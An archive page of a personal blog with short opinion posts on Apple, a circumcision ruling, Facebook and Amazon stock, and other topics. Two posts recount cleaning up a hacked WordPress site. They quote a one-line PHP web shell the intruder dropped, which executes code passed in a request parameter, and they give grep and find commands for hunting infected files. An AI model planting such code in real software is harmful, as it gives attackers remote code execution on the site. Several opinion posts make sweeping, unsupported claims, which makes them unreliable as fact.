Hashemian Blog
Web, Finance, Technology

Apple Discrimination

by @ 5:14 pm
Filed under: computers,politics — Tags: , , ,

A few weeks ago my children dragged me into the local mall's Apple store, kicking and screaming where I bought them each a Macbook, a cheap Linux knock-off in a shiny skin.

I am a devout Apple-hater and have been so since 1988 when I had to write a LISP program on a Macintosh desktop. Nothing this company does or produces has ever looked remotely exciting or interesting to me and let's not even get started with the ridiculous prices. I personally own nothing from this company and am proud of that fact.

I could have bought my children very nice Windows laptops at a third of the price, but that wasn't an option. Apple seems to have plenty of people under its spell. They can sell them street garbage stamped with the bitten-apple image like it's some magical product from Venus.

Since Apple has the policy of not selling to Iranian-Americans, I just wonder where the Apple police was on the day I wasted my hard-earned money on their junk.

Apple sucks. Always has, and probably always will.

Wordpress Base64 Hack or PHP-CGI Hack? part II

by @ 7:15 pm
Filed under: hacking,web — Tags: ,

To be factual about it, my site was hacked twice in exactly the same way over a period of couple of weeks. The first time around I noticed it when the feeds coming via Feedburner kept crashing the RSS readers because of a javascript malware block inserted right at the top of the feed. Turns out that the php files in my wordpress installation were altered to emit the offending javascript block.

Surely the hacker must have exploited some wordpress vulnerability, I thought. A quick search on the web for wordpress base64 hack, brings up plenty of pages covering such hacking cases.

I started out by examining the MySQL tables by doing a global search for terms such as base64 or eval. The wp_options table had plenty of such entries. At first it seemed like I had found the hacker's stash. wp_options is where wordpress and the plugins save their parameter data. There were also lots of entries with the "transient" keyword. In the end they turned out to be innocuous. Transients could become real nuisances, but that's a different topic.

With the database search behind me, I put the focus on the files. Deep searching for base64_decode and eval, produced a number of them. Here's a simple command to achieve this search:

$ grep -rl base64_decode *

Some of the hits were legitimate, but eventually I ran into two types of files that were obvious hacks. The first type were mostly legitimate index.php files that had been altered with a giant code block right at the top. The blocks were of the base64_decode(eval(long-hex-string)); variety. Removing the block appeared to restore the files back to their original form. The other type were small-sized php files with varied names containing one or two lines of code like eval(stripslashes($_REQUEST['a']));. This code would basically execute raw code passed in as a parameter to the page, very simple, very effective, and very dangerous.

Armed with that knowledge I went snooping around the site looking for small-sized files and any files that had been altered recently.

$ find -size -1k -name *php
$ find -mtime -7 -name *php

The first command returns php files that are 1kb or less in size. The second returns php files that are modified in the last 7 days. I dug through the long list of files, fixed the altered files by removing the malicious code blocks and then deleted the small dropped-in files.

Finally I upgraded the wordpress installation to the latest version and everything was back to good, or so I thought. Within about two weeks I was hacked again in almost the same way as the first time. How did I recover from it and plugged the hole? Hint: PHP was the actual culprit. Stay tuned …

German court bans male circumcision

by @ 11:00 pm
Filed under: religion,Uncategorized — Tags: ,

Nothing like baby penis mutilation to bring Jews and Muslims together. Kudos to this court for banning baby circumcision.

Religious Rite?
-Feel free to cut it off when you're an adult and can make a free choice.

Infection prevention?
-How about general hygiene?

HIV prevention?
-Ever heard of a condom?

German court bans male circumcision, sparks outrage among Jews, Muslims

Wordpress Base64 Hack or PHP-CGI Hack?

by @ 10:57 pm
Filed under: hacking,web — Tags: , , ,

A couple of months ago I started noticing that this blog's RSS feed, which is via Feedburner, wasn't coming through on some RSS readers. After some tests I discovered that the feed actually contained a malicious javascript block at the top. That was breaking the XML format, causing the RSS readers to fail. Turns out that It was my own site that was hacked, replicating over to Feedburner.

After a bit of investigating I found a number of files, specially those named index.php, that had been modified by a code block at the top that started with something like "eval(base64_decode(…" followed by a long string of hex numbers. I decoded the hex string and I ended up with a php code block that looked pretty devious with references to Chinese sites.

This is what was happening. A blog page is accessed by a user. Since most Wordpress activity is funneled through the index.php file the malware at the top is executed and after a couple of iterations a javascript block is produced and sent to the browser. No idea what the javascript code was doing, but safe to assume its goal was to infect the users with malware, steal data and eventually turn them into zombies in some botnet.

Do a search for Wordpress base64 hack and you'll find thousands of sites around addressing this issue. Wordpress doesn't exactly have a good security reputation but its latest versions were thought to be more secure. But in this case Wordpress wasn't at fault. Turns out the real culprit was php-cgi 5.3.5 and a nasty security hole stretching back for 8 years. The bug would allow the attacker to view the source code of a page, run arbitrary code, and generally be a pain in the a$$.

I suspect in some cases where Wordpress (or Joomla or Drupal or phpMyAdmin) has been hacked, the true culprit has been php-cgi. The reason these popular programs are targets is that their structures and operations are well-known to all including the hackers. All it takes to exploit vulnerable sites is to write simple scripts targeting known pages and letting it loose on the internet. The robot crawls around infecting sites as it find them and then those infected sites infect their users by extension. An old concept, but pretty neat in a distorted sort of a way.

There are some of questions to be answered here. Why was such a gaping hole allowed to remain in php for 8 years? Why was it publicized before it could be plugged? Why do some sites still use CGI? After all, this vulnerability didn't affect php ran as a module. Those are good questions and there are plenty of discussions about them online, so no need to rehash here.

What might be useful is explaining what I did to plug this hole on my site. Stay tuned …

Oracle's Java Bet

by @ 6:40 pm
Filed under: business,google,technology — Tags: , , ,

A couple of weeks ago a judge finally ruled that Google hadn't violated any patents when it used the Java programming language in its Android OS. Good, finally someone wasn't intimidated by Larry Ellison and ruled based on logic rather than emotion. Word has it that the judge actually took some time to learn Java to have a better grasp of the dispute, impressive.

Now comes the news that Android has hit 900k activations per day and is well on its way to reach 1m per days. That may be in part due to some confidence that Android is now a safe bet, free from oracle's licensing threats.

In retrospect, it’s easy to see why Oracle acquired Sun and its assets. Even if some of those assets, like Java or MySQL, were under GPL (essentially free to use), that's counter to how Oracle operates. Oracle had hoped, and still does, to start capitalizing on the large market shares of these products. To that end it hasn't been successful, yet.

The latest Java lawsuit outcome is a great boon to developers and users, but one shouldn't bank on Oracle's defeat in Android's case as being the end of such tactics. Undoubtedly Oracle will be back for more. Given its past business history, Oracle is nothing if not undaunted and persistent.

What's Facebook Worth?

by @ 9:51 pm
Filed under: financial,web — Tags: ,

I can't possibly the only one who's had a perverse pleasure in seeing Facebook's stock slide after the much ballyhooed IPO. It's not like I wish the company bad fortune or dislike its boss, although I don't think much of Facebook as a product nor do I use it much. It's just that something so hyped and overblown seems so out of touch with reality that one doesn't want to see it take off like it's 1999, specially if one is not along for the ride.

Given the nearly daily declines of Facebook's stock, one does however wonder where the bottom of this stock really is. At the current level of $29, it probably doesn't have much further to go, give or take a couple of dollars. At the same time something tells me that the big investors are just waiting to pounce on the stock once they believe it has sufficiently deflated.

Us mortals will know where that bottom is long after it has passed, but if one can time a purchase somewhere near that bottom, chances are that it will pay off handsomely. There's probably a lot of money on the sidelines waiting to get in and when that happens the stock would snap back with a vengeance.

Forget valuations and future earnings. This one seems to be going on pure psychology right now. Hell, even I'm thinking about getting in 🙂

Facebook IPO Price Clamp

by @ 12:53 pm
Filed under: financial — Tags: , ,

Seems like everything was on hold yesterday except for the Facebook stock price gyrations. In the end it eked out a measly 23 cents over its IPO price of $38 and that with some grand assistance from its underwriters and backers.

That assistance was so obvious, specially towards the end of the trading session. You could tell the stock really wanted to break below $38, but every time it touched that price it was nudged back up. Looked totally artificial and trigger-directed. Obviously the bankers didn't want to look foolish by having the stock close below IPO's price. That would have meant that they didn't do their homework. At least this way they can claim they priced it in the Goldilocks zone, not too hot, not too cold, but just right.

Well, the founder and a bunch of other people that matter became uber-wealthy yesterday and there's still a chance that the stock may get its footing and actually climb. Sure, it's an expensive stock with the P/E ratio currently at 122, but Amazon's P/E is an astounding 175. Going by Amazon's measure, Facebook should at least be worth $55 per share.

Amazon's Ridiculous P/E

by @ 11:09 pm
Filed under: financial,web — Tags:

Yeah I know, P/E ratio is so old school but as I read the post below I was blown away by how ridiculous Amazon's P/E ratio of 184 actually is.

For a quick verification I went down a list of stocks I follow and none even came close to that figure. Even Priceline with its unbridled share price growth, has a P/E of 34. The rest of them average somewhere in the teens.

Granted, Amazon is the number 1 online retailer, sells a nifty reader and a tablet, is a cloud computing pioneer, and is trying to break into the high fashion market, but 184?

Maybe if it were a startup with expectations of explosive growth in a year or two, that figure could be justified. But Amazon, at nearly 20 years old, is hardly a new kid on the block.

How is AMZN worth 13 AAPLs? - Apple 2.0 - Fortune Tech

Amazon, Target, and Showrooming

by @ 10:47 pm
Filed under: financial,internet,law — Tags: , ,

Last week came the news that Target stores will no longer carry Amazon's Kindle readers. The bold move was basically a retaliatory reaction by Target to what is known as showrooming.

Showrooming is how Amazon encourages its users to visit various physical stores, check out or even try out various merchandize and then go back to Amazon to order them for cheaper prices. In a sense Amazon uses the physical stores as showrooms for free and that creates an unfair advantage in favor of Amazon.

Sure, people can visit Amazon's site too to shop around but a page visit costs Amazon a tiny fraction of a penny while a shopper roaming the isles of a store, and specially inspecting and trying various items could cost the stores multiple dollars.

Target may feel good about removing Kindles from its shelves but that maneuver will be but a blip on Amazon's bottom line. Making the playing field fair will be tall order but for starters Amazon should be required to collect sales taxes on all items sold. If there's heavy resistance, then stores should be exempt from collecting sales taxes as Amazon is.

Paying sales taxes on Amazon purchases will not be popular, but if Amazon is allowed to push physical stores out of business through the unfair loopholes, that will result in a monopoly and there's little doubt that its pricing policy will not favorable by any measure once the competition is wiped out.

Who's the real prostitute?

by @ 4:36 pm
Filed under: social

Every time a woman is labeled a prostitute (like the story below) it irks me to no end. The word has such a negative and insulting connotation, its liberal usage should be avoided.

So these women sell sexual services. What exactly is wrong with that, if they're of age and not forced into it? Before you judge these women on moral grounds, consider how many wives would deny their husbands sex, if their men stopped lavishing them on holidays or birthdays.

A bunch of cheap and perverted men on a presidential trip tricked these women and stole services from them, and the women are the prostitutes? The real prostitutes are those pathetic men and the media for demeaning these women.

Open Channel - Prostitute at center of Secret Service scandal: 'I would have been able to get any information'.

« Newer PostsOlder Posts »

Powered by

Read Financial Markets  |   Home  |   Blog  |   Web Tools  |   News  |   Articles  |   FAQ  |   About  |   Privacy  |   Contact
Donate Bitcoin: 1GfrF49zFWfn7qHtgFxgLMihgdnVzhE361
© 2001-2021 Robert Hashemian   Powered by Hashemian.com